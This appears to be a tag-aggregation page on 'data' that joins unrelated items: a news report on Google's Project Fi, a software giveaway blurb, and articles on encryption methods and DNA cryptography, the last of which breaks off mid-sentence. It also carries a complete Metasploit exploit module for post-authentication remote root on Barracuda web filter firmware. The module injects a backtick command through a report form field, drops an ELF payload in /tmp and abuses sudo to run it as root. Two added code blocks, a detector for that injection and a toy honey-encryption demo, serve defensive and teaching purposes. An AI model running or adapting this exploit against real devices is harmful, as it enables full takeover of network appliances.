Showing results for tags 'data'.


  1. Google launches its own mobile network for Nexus 6 owners

Google is now a mobile carrier. Today the company has made official its plan to offer wireless service to owners of its Nexus 6 smartphone. It's called Project Fi, and Google is launching an early invite program beginning today. "Similar to our Nexus hardware program, Project Fi enables us to work in close partnership with leading carriers, hardware makers, and all of you to push the boundaries of what's possible," the company wrote in a blog post. The service is only available for the Nexus 6 and requires a special SIM card for Project Fi — it will work with both existing Nexus 6 devices and new ones. Google says that right now the service is only available as an "early access program," and during that program it won't work on other phones.

Google's new offering is unique in that the company will charge consumers only for the data they use rather than hit them with a flat monthly fee that comes with a preset amount of data. If you fail to use all the data you've paid for, Google will refund you the difference. If you go over your plan, Google will simply charge you at a pro-rated rate of $10 per GB. In other words, if you pay for data and don't use it, you get refunded. If you don't buy data and use it, you end up paying the same amount. There are no family plans available, but neither does it require a contract of any kind.

As reported previously, Google will operate its wireless service with the help of both T-Mobile and Sprint; customers will have access to both networks, and Google's service will intelligently switch between them and Wi-Fi to maintain strong reception. "We developed new technology that gives you better coverage by intelligently connecting you to the fastest available network at your location whether it's Wi-Fi or one of our two partner LTE networks," the company said.

Project Fi also supports voice calls and texting over Wi-Fi, lending subscribers more flexibility in how and where they can communicate with their contacts. Google also says it's using secure tech (there's a key that shows up in your menu bar) for when you're using public Wi-Fi hotspots. Google says Project Fi phone numbers "live in the cloud," according to Google, enabling you to text and place voice calls from a laptop or tablet without your actual phone nearby. When you are on the phone, Google says calls can seamlessly transition to LTE when you leave a Wi-Fi network. Google seems to be using the new, combined Hangouts / Google Voice infrastructure in some way for Fi, as its FAQ references it often.

If you're interested in being part of Google's mobile experiment, the signup page is here. Google says it'll be sending out a small number of invites every week starting now.

Source: Google launches its own mobile network for Nexus 6 owners | The Verge
  2. Tenorshare Any Data Recovery Pro is the most powerful data rescue software that enables you to recover lost, deleted, or formatted photos, videos, documents, emails, and other files from your computer… or any other internal / external / portable media like hard drive, SD card, microSD card, memory card, USB devices, etc. Get it now. Read more at Free Tenorshare Any Data Recovery Pro (100% discount) - SharewareOnSale
  3. # Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit
     # Exploit Author: xort
     # Vendor Homepage: https://www.barracuda.com/
     # Software Link: https://www.barracuda.com/products/webfilter
     # Version: Firmware <= 5.0.0.012
     # Tested on: Vx and Hardware platforms
     #
     # Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under privileged user with report generating
     # capabilities. This exploit leverages a command injection bug along with poor sudo permissions to obtain
     # root. xort@blacksecurity.org

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = ExcellentRanking
       include Exploit::Remote::Tcp
       include Msf::Exploit::Remote::HttpClient

       def initialize(info = {})
         super(update_info(info,
           'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',
           'Description' => %q{
             This module exploits a remote command execution vulnerability in
             the Barracuda Firmware Version <= 5.0.0.012 by exploiting a
             vulnerability in the web administration interface.
             By sending a specially crafted request it's possible to inject system
             commands while escalating to root do to relaxed sudo configuration on the local
             machine.
           },
           'Author' =>
             [
               'xort', # metasploit module
             ],
           'Version' => '$Revision: 12345 $',
           'References' =>
             [
               [ 'none', 'none'],
             ],
           'Platform' => [ 'linux'],
           'Privileged' => true,
           'Arch' => [ ARCH_X86 ],
           'SessionTypes' => [ 'shell' ],
           'Privileged' => false,
           'Payload' =>
             {
               # note: meterpreter can't run on host due to kernel 2.4 incompatibilities + this is stable
               'Compat' =>
                 {
                   'ConnectionType' => 'find',
                 }
             },
           'Targets' =>
             [
               ['Linux Universal',
                 {
                   'Arch' => ARCH_X86,
                   'Platform' => 'linux'
                 }
               ],
             ],
           'DefaultTarget' => 0))

         register_options(
           [
             OptString.new('PASSWORD', [ false, 'Device password', "" ]),
             OptString.new('ET', [ false, 'Device password', "" ]),
             OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
             OptString.new('CMD', [ false, 'Command to execute', "" ]),
             Opt::RPORT(8000),
           ], self.class)
       end

       def do_login(username, password, et)
         vprint_status( "Logging into machine with credentials...\n" )

         # timeout
         timeout = 1550;

         # params
         password_clear = "admin"
         real_user = "";
         login_state = "out"
         enc_key = Rex::Text.rand_text_hex(32)
         et = "1358817515"
         locale = "en_US"
         user = username
         password = Digest::MD5.hexdigest(username+enc_key)
         enctype = "MD5"
         password_entry = ""

         vprint_status( "Starting first routine...\n" )

         data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"

         vprint_status( "#{data}\n" )

         res = send_request_cgi(
           {
             'method' => 'POST',
             'uri' => "/cgi-mod/index.cgi",
             'cookie' => "",
             'data' => data
           }, timeout)

         vprint_status( "login got code: #{res.code} ... continuing to second request..." )
         File.open("/tmp/output2", 'w+') {|f| f.write(res.body) }

         # get rid of first yank
         password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result
         et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]

         vprint_status( "password got back = #{password} - et got back = #{et}\n" )

         return password, et
       end

       def run_command(username, password, et, cmd)
         vprint_status( "Running Command...\n" )

         exploitreq = [
           [ "primary_tab", "BASIC" ],
           [ "secondary_tab","reports" ],
           [ "realm","" ],
           [ "auth_type","Local" ],
           [ "user", username ],
           [ "password", password ],
           [ "et",et ],
           [ "role","" ],
           [ "locale","en_US" ],
           [ "q","" ],
           [ "UPDATE_new_report_time_frame","custom" ],
           [ "report_start","2013-01-25 01:14" ],
           [ "report_end","2013-01-25 02:14" ],
           [ "type","" ],
           [ "ntlm_server","" ],
           [ "kerb_server","" ],
           [ "local_group","changeme" ],
           [ "ip_group","20.20.108.0/0.0.0.0" ],
           [ "ip_address__0","" ],
           [ "ip_address__1","" ],
           [ "ip_address__2","" ],
           [ "ip_address__3","" ],
           [ "netmask__0","" ],
           [ "netmask__1","" ],
           [ "netmask__2","" ],
           [ "netmask__3","" ],
           [ "UPDATE_new_report_pattern_values","" ],
           [ "UPDATE_new_report_pattern_text","" ],
           [ "UPDATE_new_report_filter_destination","domain" ],
           [ "filter_domain","" ],
           [ "UPDATE_new_report_filter_domain","" ],
           [ "UPDATE_new_report_filter_category","" ],
           [ "UPDATE_new_report_exclude_from","" ],
           [ "UPDATE_new_report_exclude_to","" ],
           [ "UPDATE_new_report_exclude_days","" ],
           [ "allow","allow" ],
           [ "block","block" ],
           [ "warn","warn" ],
           [ "monitor","monitor" ],
           [ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ],
           [ "UPDATE_new_report_filter_count","10" ],
           [ "UPDATE_new_report_chart_type","vbar" ],
           [ "UPDATE_new_report_format","html" ],
           [ "DEFAULT_new_report_group_expand","No" ],
           [ "UPDATE_new_report_expand_user_count","5" ],
           [ "UPDATE_new_report_expand_domain_count","5" ],
           [ "UPDATE_new_report_expand_cat_count","5" ],
           [ "UPDATE_new_report_expand_url_count","5" ],
           [ "UPDATE_new_report_expand_threat_count","5" ],
           [ "report","on" ],
           [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],
           [ "UPDATE_new_report_id","" ],
           [ "UPDATE_new_report_enabled","Yes" ],
           [ "secondary_scope","report" ],
           [ "secondary_scope_data","" ],
           [ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ],
           [ "UPDATE_new_report_delivery","external" ],
           [ "UPDATE_new_report_delivery_dest_email","" ],
           [ "UPDATE_new_report_server","new" ],
           [ "UPDATE_new_external_server_type","smb" ],
           [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],
           [ "UPDATE_new_external_server","4.4.4.4" ],
           [ "UPDATE_new_external_server_port","445" ],
           [ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ],
           [ "UPDATE_new_external_server_password","asdf" ],
           [ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ],
           [ "UPDATE_new_report_frequency", "once" ],
           [ "UPDATE_new_report_split", "no" ],
           [ "add_report_id","Apply" ],
           [ "remover","" ]
         ]

         data = Rex::MIME::Message.new
         data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)

         exploitreq.each do |xreq|
           data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")
         end

         post_data = data.to_s
         post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")

         datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"

         vprint_status( "sending..." )
         res = send_request_cgi({
           'method' => 'POST',
           'uri' => "/cgi-mod/index.cgi",
           'ctype' => "multipart/form-data; boundary=#{data.bound}",
           'data' => post_data,
           'headers' =>
             {
               'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               'Accept-Language' => "en-US,en;q=0.5"
             }
         })

         if res.code == 200
           vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" )
           vprint_status( "password: #{password} et: #{et}\n" )
         end

         vprint_status( "login got code: #{res.code} from report_results.cgi\n" )
         File.open("/tmp/output4", 'w+') {|f| f.write(res.body) }
       end

       def run_script(username, password, et, cmds)
         vprint_status( "running script...\n")
       end

       def exploit
         # timeout
         timeout = 1550;

         user = "admin"

         # params
         real_user = "";
         login_state = "out"
         et = "1358817515" #epoch time
         locale = "en_US"
         user = "admin"
         password = ""
         enctype = "MD5"
         password_entry = ""
         password_clear = "admin"

         vprint_status("<- Encoding payload to elf string...")
         elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
         encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly

         if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
           password_clear = "admin"
           password = datastore['PASSWORD']
           et = datastore['ET']
         # else - if no 'CMD' string - add code for root shell
         else
           password, et = do_login(user, password, et)
           vprint_status("new password: #{password}\n")
         end

         sleep(5)

         if not datastore['CMD'].nil? and not datastore['CMD'].empty?
           cmd = datastore['CMD']
         end

         run_command(user, password, et, cmd)

         # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm
         cmd = "echo -ne #{encoded_elf} > /tmp/x ;"
         cmd += "chmod +x /tmp/x ;"

         # backup static_routes file
         cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz"
         cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes"

         # execute elf as root
         cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"

         # restore static_routes file
         cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"

         run_command(user, password, et, cmd)
         sleep(2)
         handler
         sleep(5)
       end
     end

     Source: http://packetstorm.wowhacker.com/1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt
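
A defensive check for the request shape used by the module in the post above, added here as an example (it is not part of the original post or of any Barracuda code): it extracts the `UPDATE_new_external_server*` fields from a multipart body and flags shell metacharacters in them. It splits on the boundary string instead of relying on strict MIME framing, because the module removes the CRLF in front of each boundary; the function names and both sample bodies are constructed for illustration.

```python
import re

# Sequences that let a form value break out of a quoted shell argument.
SHELL_META = re.compile(r"`|\$\(|[;|&<>\r\n]")
FIELD_NAME = re.compile(rb'name="([^"]*)"')
# Field-name prefix taken from the request shown on the page.
WATCHED_PREFIX = "UPDATE_new_external_server"


def parse_form_fields(body: bytes, boundary: str) -> dict:
    """Return {field name: value}, splitting on the raw boundary string."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        head, sep, value = part.partition(b"\r\n\r\n")
        match = FIELD_NAME.search(head)
        if not sep or not match:
            continue  # preamble or the closing "--" marker
        if value.endswith(b"\r\n"):
            value = value[:-2]  # framing CRLF; absent when it was stripped
        fields[match.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def suspicious_fields(body: bytes, boundary: str,
                      prefix: str = WATCHED_PREFIX) -> list:
    """List (name, value) pairs in watched fields carrying shell metacharacters."""
    return [(name, value)
            for name, value in parse_form_fields(body, boundary).items()
            if name.startswith(prefix) and SHELL_META.search(value)]


def build_body(boundary: str, pairs, strip_crlf: bool = False) -> bytes:
    """Build a constructed sample body; strip_crlf mimics the CRLF removal on the page."""
    text = "".join(
        f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
        for n, v in pairs) + f"--{boundary}--\r\n"
    if strip_crlf:
        text = text.replace("\r\n--" + boundary, "--" + boundary)
    return text.encode("latin-1")


# Constructed samples (not captured traffic).
BOUNDARY = "---------------------------" + "123456789012345678901234567890"
BENIGN = [("UPDATE_new_external_server_type", "smb"),
          ("UPDATE_new_external_server_username", "backup_svc"),
          ("UPDATE_new_report_filter_actions", "allow,block,warn,monitor")]
INJECTED = [("UPDATE_new_external_server_type", "smb"),
            ("UPDATE_new_external_server_username", '"` id `"'),
            ("UPDATE_new_external_server_password", "asdf")]

if __name__ == "__main__":
    for label, pairs in (("benign", BENIGN), ("injected", INJECTED)):
        for strip in (False, True):
            body = build_body(BOUNDARY, pairs, strip)
            print(label, "crlf-stripped" if strip else "well-formed",
                  suspicious_fields(body, BOUNDARY))
```
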
  4. Keeping personal information secure and protected remains a top priority for computer users who now rely heavily on information systems to manage a large part of their personal and business lives. One of the ways to make sure only authorized users have access to information is the use of encryption, a process that transforms data from “cleartext to ciphertext” and back as a means to keep it secret from others. This is done through a combination of hardware- and software-based encryption. The scope is always the prevention of unintended data leakage. The wide variety of types of encryption available (e.g., symmetric and asymmetric encryption, hardware-based or software-based) can make a person uncertain on which one is best to suit their needs. Each of the cryptographic systems addresses specific aspects of keeping systems secure, so it is important to identify which one is the most appropriate for the situation. This article surveys how to gain cryptographic data protection with a variety of methods and mechanisms for the sake of digital privacy as well as solutions for data-at-rest and data-in-motion. It also discusses new encryption techniques.

The Need of Encryption for Data Protection

Encryption is a necessity for organizations and users that handle sensitive data. Data ought to be secured for the entire duration of their lifecycle (at-rest, in-transit and in-use). Whether they are at rest in storage and databases on site or backed up in a cloud, whether they are sent to end users within organizations or remotely accessed through mobile devices, all data need proper protection and ad-hoc solutions. The growing use of mobile devices to access sensitive data and corporate applications along with the use of cloud solutions for software, storage, hardware and services has opened a new world of security problems.
Data loss prevention, security practices and strategies employed (firewalls, IDS, coupled with authentication and access controls) in addition to encryption tools are more important than ever as information is no longer being stored and processed in the safety of companies’ on-site servers and behind firewalls, but is actually being manipulated and transferred through a variety of communication channels.

Data protection is nothing new, but it remains a significant challenge for organizations and businesses needing to find better ways to protect user data from unauthorized use. Be it corporate-, personal-, customer- or transaction-data, the risk of theft or loss throughout the lifecycle is massive. With data theft caused by employees and external parties on the rise, businesses risk their reputation, lack of regulatory compliance, and, ultimately, loss of clients.

Lack of Encryption

Why encrypt? Since a complex password by itself is no longer good enough as a means to protect corporate or personal data, by encrypting the data exchanged between the client and server, any sensitive information can be sent over a network, such as the Internet, with less risk of being intercepted during transit. Plaintext can be easily intercepted by prying eyes and eavesdroppers when transiting in data streams; information can be stolen or altered. Encryption is an effective way of making sure data remain secure. Data, however, is not just vulnerable when in transit.

Some of the worst data security breaches noted in the 21st century and pertaining to lack of encryption go as far back as 2005 when CardSystems Solutions’ system was hacked and was victim of an SQL Trojan attack; hackers gained access to names and account numbers of more than 40 million card holders. Security reports noted that the company never encrypted the data, thus exposing personal info on all its clients.
Another noteworthy incident occurred in 2006 with a group of hackers taking advantage of a weak data encryption system at TJX Companies Inc. Poor security on the company’s wireless networks had resulted in massive data theft, and 94 million credit cards were exposed. Another instance that shows the human element being the weakest link in the security chain is the case of the U.S. Department of Veterans Affairs’ unencrypted national database theft. Names, social security numbers and other sensitive information were found on a laptop and external hard drive that were both stolen. This episode, also in 2006, affected some 26.5 million veterans, whose personal data was taken in a burglary from a VA analyst’s Maryland home.

A more recent event involved Sony’s PlayStation Network that had 12 million unencrypted credit card numbers hacked. In 2012, a NASA laptop was stolen; it contained records of sensitive personally identifiable information of employees and contractors. Lately, news has reported of an unencrypted, password-protected laptop that was stolen at the Community Technology Alliance containing social security numbers and names of 1,177 people. Another device containing data for 2,800 patients was stolen from Northwestern Memorial Health Care.

Encryption Solutions

As the need for encryption is clear to attempt ensuring the integrity and confidentiality of data, the first decision security professionals need to make is between software-based or hardware-based encryption. Both have pros and cons to be considered and can definitely be applied in a combination of ways to ensure maximum protection according to the users’ needs.

Software-based encryption can be extended to all data, devices, and users in an organization. It works well to secure e-mails, instant messaging, data in transit and web sites. These solutions are normally cheaper and easy to customize and update.
Common drawbacks are performance degradation and vulnerabilities linked to those of the operating systems in which they operate. Risks are linked also to the ease of being turned off by users.

Hardware-based solutions are specific to the device they protect. Full drive encryption (FDE) or solutions like self-encrypted drives (SEDs) are an effective approach that simplifies the deployment of security for data at rest and makes it easier for organizations to manage security of data when stored. The advantage of hardware-based solutions is that they bypass many of the typical drawbacks of software-based solutions like performance degradation or vulnerability to attacks aimed at the encryption key stored in memory. Because encryption is available at drive level, this hardware solution is also perfectly independent of any software or operating system used, and usually cannot be turned off by users. Drawbacks are obvious. Hardware solutions are specific to the devices they protect, and updates can normally be performed only by substituting the device.

The Encryption Process & Protecting Data Today

One of the basic concepts of encryption is the need for keys to encrypt and decrypt the message. The process of encryption is done with two individual keys – a private key and a public key; this is referred to as asymmetric encryption, while symmetric encryption requires using one key for both steps. Encryption simply acts as a form of digital lock that prevents unauthorized users from accessing data. In addition, by adding a signature with a private key, a person can prove his or her own identity and make tampering with the message more difficult. Just like sensitive messages, the key must also be adequately protected, secured and kept hidden from unauthorized users.

A number of encryption methods can be employed to secure data especially when in transit, since that is when they are more vulnerable.
The content can be intercepted through some effort of wiretapping or eavesdropping by an intruder. In link-to-link encryption, for example, the message is decrypted at each host as it travels so it is vulnerable if any of the hosts is not secure. This method works well within an organization, for internal use, where all communication nodes security is well known, but might not be the safest method when the message is out in the open. Lately, much attention has been given to end-to-end encryption. This system allows safety of data by ensuring that only the people that are communicating are able to read the message. No one except the sender and the receiver is able to decrypt the message (not even the Internet provider) which is passed from host to host still encrypted. A renowned German e-mail provider, for example, has implemented the use of this methodology for all its users in an attempt to secure their communication from eavesdropping and intrusion. As securing information in a datacenter that requires protection for a multi-vendor infrastructure or the cloud is becoming a widespread need, new solutions and techniques had to be developed to render the transmission of data more secure. In most cases, solutions are needed to be deployed simultaneously on network shares, file services, application and web servers as well as database servers. Techniques like tokenization have been deployed to make sure that data exchanged from different servers and sent to onsite, cloud and mobile end users are still safely handled. In the case of tokenization, for example, data are safely stored and replaced by tokens that are used within an organization to process the information, trigger action and perform tasks. The data never leave their safe storage place and cannot be compromised even if the token is intercepted. This method is extremely helpful when dealing with credit card numbers and financial info in general. 
Honey encryption, instead, is a technique that can provide additional security when passwords are used as keys. This is particularly effective against conventional brute-force attacks. The concept is simple; in normal circumstances, when intruders intercept a message and attempt to guess the key that encrypts it, all they can get is a manifestly non-usable response. The result is that the malicious hacker continues to attempt until successful. Honey encryption, devised by Juels and Ristenpart, produces a ciphertext that when decrypted with a number of wrong keys gives a “honey message”, a fake plaintext that satisfies the attacker but does not relinquish any real data. Although effective, honey encryption, obviously, is not helpful when the attacker already has a few of the puzzle pieces (for example the public key associated with the private key) and therefore is useless in the protection of HTTPS certificate keys. The method is, however, effective when protecting, for example, password vaults, collections of passwords protected by one master key. An interesting technique for the handling of sensitive data in a cloud environment has been designed by Craig Gentry, a researcher from IBM: Homomorphic encryption. This form of encryption allows users to store data in a cloud encrypted while still being able to analyze and mine data. In fact, computations can be performed on the encrypted data in the cloud server, and only the results are decrypted by the end user. This can be used for any data, including, for example, entire collections of e-mails and messages that could be securely worked on without exposing the messages contained within. Although homomorphic encryption has been explored for 30 years, it is thanks to the work of Gentry (since 2008) that finally the system is being perfected and getting close to having practical applications. 
Although still too slow and requiring a larger-than-practical number of computations, this type of encryption could soon be applied.

DNA Cryptography is another method being explored; it can be defined as hiding data as a DNA Sequence. This technique is based on DNA computing designed by the work of Leonard Max Adleman (the A in RSA) beginning in the year 1994. This modus operandi is still in the initial phases of development, but results are promising.

One more is for Quantum Cryptographic tasks and, in particular, QKD (Quantum Key Distribution). Secure communication is ensured by a random key shared by sender and receiver. The advantage of this method is that, as for all quantum systems, a third party that enters it creates a disturbance that can be noted by the sender and receiver. An eavesdropper would cause the communication to be aborted, as the key would not be shared.

Conclusion

According to data collected by BreachLevelIndex, more than 2 million records per day were breached in the year 2014. It is clear that more and more attention needs to be given to the security of data both at rest and in transit. Coupled with users’ access control, encryption is an effective means of securing sensitive information. Multiple techniques of cryptography are important to ensure data integrity in the three components of the CIA (Confidentiality, Integrity, Availability).

Encryption is not just for companies and organizations. Individual users also should consider protecting their own data. With mobile devices now allowing users’ access to all their sensitive information (personal, financial, even medical) and with the growing use of cloud solutions, it is paramount that encryption is adopted and new techniques developed. Currently, many encryption products are available on the market, some are free, and can suit everyone’s needs.
With today’s encryption technologies constantly being developed to deliver enhanced security across a range of channels for private communication and storage, there is no reason why this protective measure should not be applied to safeguard data from hackers who continue to develop sophisticated techniques in the attempt to steal information.

Whatever the data are and wherever they reside, they ought to be safeguarded: password protected and encrypted. Business data needs to be safe and placed in a secure environment. Failure to apply authentication and end-to-end encryption for limited access to data could lead to possible exposure by intruders. Whatever protection may be necessary depends on the assets that are being protected. Often, businesses requirements and regulatory considerations will dictate what approach is best. Users need to analyze their needs and apply the right products to prevent unauthorized access to information and opt to utilize software and hardware technologies to facilitate the encryption of computer, mobile devices and media.

References

Allen, L. (2012, August 3). Securing Data on a Moving Target: Self-Encrypting Drives Deliver Top Security, Performance and Manageability. Retrieved from Securing Data on a Moving Target: Self-Encrypting Drives Deliver Top Security, Performance and Manageability | StorageReview.com - Storage Reviews
Juels, A. (2014, January 29). Honey Encryption: Security Beyond the Brute-force Bound. Retrieved from http://pages.cs.wisc.edu/~rist/papers/HoneyEncryptionpre.pdf
Naone, E. (2011, May/June). Homomorphic Encryption – Making cloud computing more secure. Retrieved from Homomorphic Encryption - MIT Technology Review
Olzak, T. (2010, May 7). Choose Encryption Wisely. Retrieved from What is Encryption and When Should You Use it to Protect Data and Computers
Paganini, P. (2015, February 20). The Future of Data Security: DNA Cryptography and Cryptosystems. Retrieved from The Future of Data Security: DNA CryptographySecurity Affairs
Schneier, B. (2010, June 30). Data at Rest vs. Data in Motion. Retrieved from https://www.schneier.com/blog/archives/2010/06/data_at_rest_vs.html
Simonite, T. (2014, January 29). “Honey Encryption” Will Bamboozle Attackers with Fake Secrets. Retrieved from http://www.technologyreview.com/news/523746/honey-encryption-will-bamboozle-attackers-with-fake-secrets/

Source
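
The honey encryption behaviour described in the post above (a wrong key yields a plausible fake plaintext instead of an obvious failure), as an added toy illustration that is not code from the post or from the cited paper. It encodes a PIN into a seed interval sized by its probability and masks the seed with a password-derived pad; the PIN weights, function names and iteration count are assumptions made for the demo.

```python
import bisect
import hashlib
import os
import secrets

# Constructed message distribution (weights invented for the demo):
# candidate 4-digit PINs and how likely a user is to pick each, in percent.
PIN_WEIGHTS = [("1234", 40), ("0000", 20), ("1111", 15),
               ("2580", 10), ("7391", 10), ("4826", 5)]
SCALE = 1 << 24          # seeds allotted per weight unit
CUM = []                 # exclusive upper bound of each PIN's seed interval
_total = 0
for _pin, _weight in PIN_WEIGHTS:
    _total += _weight * SCALE
    CUM.append(_total)
SEED_SPACE = _total
ITERATIONS = 10_000      # demo value; a real password KDF needs far more work


def dte_encode(pin: str) -> int:
    """Map a PIN to a random seed inside the interval that PIN owns."""
    idx = [p for p, _ in PIN_WEIGHTS].index(pin)  # ValueError if not in message space
    lo = CUM[idx - 1] if idx else 0
    return lo + secrets.randbelow(CUM[idx] - lo)


def dte_decode(seed: int) -> str:
    """Map any seed in [0, SEED_SPACE) back to the PIN owning that interval."""
    return PIN_WEIGHTS[bisect.bisect_right(CUM, seed)][0]


def _pad(password: str, salt: bytes) -> int:
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return int.from_bytes(digest, "big") % SEED_SPACE


def honey_encrypt(password: str, pin: str):
    """Return (salt, ciphertext); the ciphertext is the masked seed."""
    salt = os.urandom(16)
    return salt, (dte_encode(pin) + _pad(password, salt)) % SEED_SPACE


def honey_decrypt(password: str, salt: bytes, ciphertext: int) -> str:
    """Every password yields a valid PIN; only the right one yields the real PIN."""
    return dte_decode((ciphertext - _pad(password, salt)) % SEED_SPACE)


def decoys(salt: bytes, ciphertext: int, guesses) -> dict:
    """Show what a brute-force attacker sees for each guessed password."""
    return {g: honey_decrypt(g, salt, ciphertext) for g in guesses}


if __name__ == "__main__":
    salt, ct = honey_encrypt("correct horse", "7391")
    print("right password ->", honey_decrypt("correct horse", salt, ct))
    for guess, pin in decoys(salt, ct, ["letmein", "qwerty", "hunter2"]).items():
        print(f"wrong password {guess!r} -> {pin}")
```

Because decoys follow the same distribution as real PINs, the attacker cannot tell a successful guess from a failed one by inspecting the output, which is the property the post attributes to password vaults protected this way.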
  5. What is Cryptography?

Cryptography is the science of study of secret writing. It helps in encrypting a plain text message to make it unreadable. It is a very ancient art; the root of its origin dates back to when Egyptian scribes used non-standard hieroglyphs in an inscription. Today, electronic or Internet communication has become more prevalent and a vital part of our everyday life. Securing data at rest and data in transit has been a challenge for organizations. Cryptography plays a very important role in the CIA triad of Confidentiality, Integrity and Availability. It provides mathematical techniques related to aspects of information security such as confidentiality, data integrity, entity authentication, and data origin authentication. Over the ages, these techniques have evolved tremendously with technological advancements and growing computing power.

Encryption is a component in cryptography or science of secret communication. The part “en” means “to make” and “crypt” means hidden or secret. Encryption can be defined as a process to make information hidden or secret. In this digital age, encryption is based on two major algorithms.

  • Asymmetric or Public key cryptography: Uses two keys, one is a public encryption key and other is a private decryption key.
  • Symmetric or Secret key cryptography: Uses the same key for encryption and decryption processes.

Challenges in traditional cryptography

The keys used in modern cryptography are so large, in fact, that a billion computers working in conjunction with each processing a billion calculations per second would still take a trillion years to definitively crack a key. Though this doesn’t seem to be a problem now, it soon will be. Quantum computers are going to replace traditional binary computing in the near future. Since they can operate on the quantum level, these computers are expected to be able to perform calculations and operate at speeds no computer in use now could possibly achieve.
So the codes that would take a trillion years to break could possibly be cracked in much less time with quantum computers. Traditional cryptography has the problem of key distribution and eavesdropping.

Information security expert Rick Smith points out that the secrecy or strength of a cipher ultimately rests on three major things:

  • The infrastructure it runs in: If the cryptography is implemented primarily in software, then the infrastructure will be the weakest link. If Bob and Alice are trying to keep their messages secret, Tom’s best bet is to hack into one of their computers and steal the messages before they’re encrypted. It’s always going to be easier to hack into a system, or infect it with a virus, than to crack a large secret key. In many cases, the easiest way to uncover a secret key might be to eavesdrop on the user and intercept the secret key when it’s passed to the encryption program.
  • Key size: In cryptography, key size matters. If an attacker can’t install a keystroke monitor, then the best way to crack the ciphertext is to try to guess the key through a “brute-force” trial-and-error search. A practical cipher must use a key size that makes brute-force searching impractical. However, since computers get faster every year, the size of a “borderline safe” key keeps growing.
  • Algorithm quality: Cipher flaws can yield “shortcuts” that allow attackers to skip large blocks of keys while doing their trial-and-error search. For example, the well-known compression utility PKZIP traditionally incorporated a custom-built encryption feature that used a 64-bit key. In theory, it should take 2^64 trials to check all possible keys. In fact, there is a shortcut attack against PKZIP encryption that only requires 2^27 trials to crack the ciphertext. The only way to find such flaws is to actually try to crack the algorithm, usually by using tricks that have worked against other ciphers.
An algorithm usually only shows its quality after being subjected to such analyses and attacks. Even so, the failure to find a flaw today doesn’t guarantee that someone won’t find one eventually. At present, RSA Key length of 2048 bits is considered “Acceptable”. In 2009, researchers were able to crack a 768-bit RSA key and it remains as the current factoring record for the largest general integer. The Lenstra group estimated that factoring a 1024-bit RSA modulus would be about 1,000 times harder than their record effort with the 768-bit modulus, or in other words, on the same hardware, with the same conditions, it would take about 1,000 times as long. Breaking a 2048 bit key would take about 4.3 billion times longer than doing it for a 1024-bit key. A symmetric key algorithm DES is considered to be insecure now since the 56-bit key size it used was too small. Although DES uses a block size of 64-bit, only 56 bits are actually used by the algorithm; the final 8 bits are used for the parity check. In simple words, traditional cryptography and its security are based on difficult mathematical problems which are mature both in theory and realization. Both the secret-key and public-key methods of cryptology have unique flaws. With growth of computing power, the strength of traditional cryptography might become weak and breakable. DNA Computing A new technique for securing data using the biological structure of DNA is called DNA Computing (A.K.A molecular computing or biological computing). It was invented by Leonard Max Adleman in the year 1994 for solving the complex problems such as the directed Hamilton path problem and the NP-complete problem similar to The Traveling Salesman problem. Adleman is also known as the ‘A’ in the RSA algorithm – an algorithm that in some circles has become the de facto standard for industrial-strength encryption of data sent over the Web. 
The technique later on was extended by various researchers for encrypting and reducing the storage size of data that made the data transmission over the network faster and secured. DNA can be used to store and transmit data. The concept of using DNA computing in the fields of cryptography and steganography has been identified as a possible technology that may bring forward a new hope for unbreakable algorithms. Strands of DNA are long polymers of millions of linked nucleotides. These nucleotides consist of one of four nitrogen bases, a five carbon sugar and a phosphate group. The nucleotides that make up these polymers are named after the nitrogen base that it consists of: Adenine (A), Cytosine (C), Guanine (G) and Thymine (T). Mathematically, this means we can utilize this 4 letter alphabet Σ = {A, G, C, T} to encode information, which is more than enough considering that an electronic computer needs only two digits, 1 and 0, for the same purpose. Advantages of DNA computing Speed – Conventional computers can perform approximately 100 MIPS (millions of instruction per second). Combining DNA strands as demonstrated by Adleman made computations equivalent to 10^9 or better, arguably over 100 times faster than the fastest computer. Minimal Storage Requirements – DNA stores memory at a density of about 1 bit per cubic nanometer, where conventional storage media requires 10^12 cubic nanometers to store 1 bit. Minimal Power Requirements – There is no power required for DNA computing while the computation is taking place. The chemical bonds that 